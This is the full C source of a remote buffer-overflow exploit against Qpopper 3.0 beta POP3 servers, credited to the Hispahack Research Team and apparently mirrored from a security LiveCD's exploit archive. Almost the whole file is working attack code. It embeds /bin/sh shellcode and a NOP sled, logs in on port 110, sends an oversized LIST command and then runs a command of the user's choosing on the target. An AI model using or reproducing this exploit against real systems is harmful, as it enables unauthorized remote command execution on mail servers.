home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / pop3 / qpop-xploit.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  5.9 KB  |  258 lines
  1. /*
  2.  * !Hispahack Research Team
  3.  * http://hispahack.ccc.de
  4.  *
  5.  * By Zhodiac <zhodiac@softhome.net>
  6.  *
  7.  * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
  8.  * Overflow at pop_list()->pop_msg()
  9.  *
  10.  *   Tested: (overflowable)
  11.  *
  12.  *           3.0beta28  offset=0
  13.  *           3.0beta26  offset=0
  14.  *           3.0beta25  offset=0
  15.  *
  16.  * Untested: (but overflowable)
  17.  *
  18.  *           3.0beta29
  19.  *           3.0beta28
  20.  *           3.0beta27
  21.  *           3.0beta26
  22.  *           3.0beta25
  23.  *           3.0beta24
  24.  *           3.0beta23
  25.  *           3.0beta22
  26.  *           3.0beta21
  27.  *           3.0beta20
  28.  *           3.0beta19
  29.  *           3.0beta18
  30.  *           3.0beta17
  31.  *           3.0beta16
  32.  *           3.0beta15
  33.  *           3.0beta14
  34.  *           3.0beta13
  35.  *           3.0beta12
  36.  *           3.0beta11
  37.  *           3.0beta10
  38.  *           3.0beta9
  39.  *           3.0beta8
  40.  *           3.0beta7
  41.  *           3.0beta6
  42.  *           3.0beta5
  43.  *           3.0beta4
  44.  *           3.0beta3
  45.  *           3.0beta2
  46.  *           3.0beta1
  47.  *           3.0 *
  48.  *
  49.  * #include <standar/disclaimer.h>
  50.  *
  51.  * This code is dedicated to my love [CrAsH]] and to all the people who
  52.  * were raided in Spain in the last few days.
  53.  *
  54.  * Madrid 10/1/2000
  55.  *
  56.  * missnglnk <missnglnk@tribune.intranova.net>
  57.  * - Allows you to specify the command to execute on the remote host,
  58.  *   and added network support to the program so you do not need netcat
  59.  *   to use this.
  60.  */
  61.  
  62. #include <stdio.h>
  63. #include <stdlib.h>
  64. #include <unistd.h>
  65. #include <sys/socket.h>
  66. #include <sys/types.h>
  67. #include <netdb.h>
  68. #include <netinet/in.h>
  69. #include <arpa/inet.h>
  70.  
  71. #define BUFFERSIZE 1004
  72. #define NOP 0x90
  73. #define OFFSET 0xbfffd9c4
  74. // #define OFFSET 0x0
  75.  
  76. char shellcode[]=
  77.   "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
  78.   "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
  79.   "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";
  80.  
  81.  
  82. void usage(char *progname)
  83. {
  84.   fprintf(stderr,"Usage: (%s <hostname> <login> <password> <command> [<offset>]\n",progname);
  85.   exit(1);
  86. }
  87.  
  88. int main(int argc, char **argv)
  89. {
  90.   char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
  91.   unsigned long *long_ptr,offset=OFFSET;
  92.   int aux,sock;
  93.   struct sockaddr_in sin;
  94.   unsigned long ip;
  95.   struct hostent *he;
  96.  
  97.   fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
  98.   fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");
  99.  
  100.   if (argc<5) usage(argv[0]);
  101.  
  102.   if (argc==6) offset+=atol(argv[5]);
  103.  
  104.   ptr=buffer;
  105.   memset(ptr,0,sizeof(buffer));
  106.   memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
  107.   ptr+=sizeof(buffer)-strlen(shellcode)-16;
  108.   memcpy(ptr,shellcode,strlen(shellcode));
  109.   ptr+=strlen(shellcode);
  110.   long_ptr=(unsigned long*)ptr;
  111.   for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
  112.   ptr=(char *)long_ptr;
  113.   *ptr='\0';
  114.  
  115.   fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
  116.   fprintf(stderr,"Offset: 0x%lx\n\n",offset);
  117.  
  118.   snprintf(username, sizeof(username), "USER %s\n",argv[2]);
  119.   snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
  120.   snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
  121.   snprintf(command, sizeof(command), "%s\n", argv[4]);
  122.  
  123.   if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  124.     {
  125.       perror("socket()");
  126.       return -1;
  127.     }
  128.  
  129.   if ((he = gethostbyname(argv[1])) != NULL)
  130.     {
  131.       ip = *(unsigned long *)he->h_addr;
  132.     }
  133.   else
  134.     {
  135.       if ((ip = inet_addr(argv[1])) == NULL)
  136.         {
  137.           perror("inet_addr()");
  138.           return -1;
  139.         }
  140.     }
  141.  
  142.   sin.sin_family = AF_INET;
  143.   sin.sin_addr.s_addr = ip;
  144.   sin.sin_port = htons(110);
  145.  
  146.   if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
  147.     {
  148.       perror("connect()");
  149.       return -1;
  150.     }
  151.  
  152.   if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
  153.     {
  154.       perror("read()");
  155.       return -1;
  156.     }
  157.  
  158.   if (strstr(rcvbuf, "+OK") == NULL)
  159.     {
  160.       printf("Server didnt respond with ok\n");
  161.       rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  162.       printf("\t%s\n", rcvbuf);
  163.       return -1;
  164.     }
  165.  
  166.   rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  167.   printf("\t%s\n", rcvbuf);
  168.   bzero(rcvbuf, sizeof(rcvbuf));
  169.  
  170.   if (write(sock, username, strlen(username)) < strlen(username))
  171.     {
  172.       perror("write()");
  173.       return -1;
  174.     }
  175.  
  176.   if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
  177.     {
  178.       perror("read()");
  179.       return -1;
  180.     }
  181.  
  182.   if (strstr(rcvbuf, "+OK") == NULL)
  183.     {
  184.       printf("Server didnt respond with username ok\n");
  185.       rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  186.       printf("\t%s\n", rcvbuf);
  187.       return -1;
  188.     }
  189.  
  190.   rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  191.   printf("\t%s\n", rcvbuf);
  192.   bzero(rcvbuf, sizeof(rcvbuf));
  193.  
  194.   if (write(sock, password, strlen(password)) < strlen(password))
  195.     {
  196.       perror("write()");
  197.       return -1;
  198.     }
  199.  
  200.   if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
  201.     {
  202.       perror("read()");
  203.       return -1;
  204.     }
  205.  
  206.   if (strstr(rcvbuf, "+OK") == NULL)
  207.     {
  208.       printf("Server didnt respond with password ok\n");
  209.       rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  210.       printf("\t%s\n", rcvbuf);
  211.       return -1;
  212.     }
  213.  
  214.   rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  215.   printf("\t%s\n", rcvbuf);
  216.   bzero(rcvbuf, sizeof(rcvbuf));
  217.  
  218.   if (write(sock, exploit, strlen(exploit)) < strlen(exploit))
  219.     {
  220.       perror("write()");
  221.       return -1;
  222.     }
  223.  
  224.   if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
  225.     {
  226.       perror("read()");
  227.       return -1;
  228.     }
  229.  
  230.   rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  231.   printf("\t%s\n", rcvbuf);
  232.   bzero(rcvbuf, sizeof(rcvbuf));
  233.  
  234.   if (write(sock, command, strlen(command)) < strlen(command))
  235.     {
  236.       perror("write()");
  237.       return -1;
  238.     }
  239.  
  240.   if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
  241.     {
  242.       perror("read()");
  243.       return -1;
  244.     }
  245.  
  246.   rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  247.   printf("\t%s\n", rcvbuf);
  248.   bzero(rcvbuf, sizeof(rcvbuf));
  249.  
  250.   if (close(sock) < 0)
  251.     {
  252.       perror("close()");
  253.       return -1;
  254.     }
  255.  
  256.   return(0);
  257. }
  258. /*                    www.hack.co.za                  [29 Feb 2000]*/